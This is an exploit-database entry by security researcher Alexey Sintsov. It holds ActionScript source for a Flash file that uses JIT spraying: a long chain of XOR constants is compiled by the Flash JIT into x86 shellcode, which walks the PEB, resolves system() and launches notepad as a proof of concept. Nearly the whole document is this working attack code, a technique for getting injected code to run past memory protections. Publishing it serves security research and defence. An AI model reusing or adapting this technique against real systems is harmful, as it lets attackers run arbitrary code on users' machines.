# Title: JITed exec notepad shellcode # EDB-ID: () # CVE-ID: () # OSVDB-ID: () # Author: Alexey Sintsov # Published: # Verified: yes # Download N/A
// JIT.swf // // By Alexey Sintsov // dookie@inbox.ru // a.sintsov@dsec.ru // // DSecRG - Digital Security Research Group [dsecrg.com] // // PEB-DLL-System()-notepad //
package { import flash.display.MovieClip public class Main extends MovieClip { function funcXOR1() { var jit=(0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c909090^ 0x3c90C033^ 0x3c9030b0^ 0x3c008b64^ 0x3c0c408b^ 0x3c1c408b^ 0x3c08508b^ 0x3c20788b^ 0x3c90008b^ 0x6a6d3f80^ 0x3c90eA75^ 0x3c904747^ 0x6a733f80^ 0x3c90ef75^ 0x3c904747^ 0x6a763f80^ 0x3c90ef75^ 0x3c904747^ 0x6a633f80^ 0x3c90ef75^ 0x3c529090^ 0x3c3cc283^ 0x3c903a8b^ 0x3c24148b^ 0x3c90d703^ 0x3c78c283^ 0x3c903a8b^ 0x3c24148b^ 0x3c90d703^ 0x3c18c283^ 0x3c903a8b^ 0x3c04c283^ 0x3c901a8b^ 0x3c241c03^ 0x3c04c283^ 0x3c90328b^ 0x3c243403^ 0x3c04c283^ 0x3c900a8b^ 0x3c240c03^ 0x3cb89090^ 0x3c900000^ 0x3c9065b0^ 0x3c906db4^ 0x3c905090^ 0x3cb89090^ 0x3c907473^ 0x3c9073b0^ 0x3c9079b4^ 0x3c905090^ 0x3c90d78b^ 0x3c90ff33^ 0x3c90C033^ 0x3c535156^ 0x14909090^ 0x3c909090^ 0x3c574790^ 0x3c90C033^ 0x3c24048b^ 0x3c02e0c1^ 0x3c90f003^ 0x3c90068b^ 0x3c18c483^ 0x3c240403^ 0x3c18ec83^ 0x3c90c933^ 0x3c9006b1^ 0x3c10c483^ 0x3c90f48b^ 0x3c90f88b^ 0x3c10c483^ 0x6a90a6f3^ 0x14901474^ 0x3c1cec83^ 0x3c595b5f^ 0x3c90905e^ 0x3c908beb^ 0x3c1cec83^ 0x3c595b5f^ 0x3c90905e^ 0x3c90e7d1^ 0x3c90cf03^ 0x3c90c033^ 0x3c018b66^ 0x3c02e0c1^ 0x3c90c303^ 0x3c90188b^ 0x3c08c483^ 0x3c241c03^ 0x646170B8^ 0x000000b9^ 0x3C50c12b^ 0x00B89090^ 0x3c906574^ 0x3c906fb4^ 0x3C506eb0^ 0x3cd3ff54^ 0x3ccccccc);
return jit;
} function Main() { var ret1=funcXOR1(); } } }
|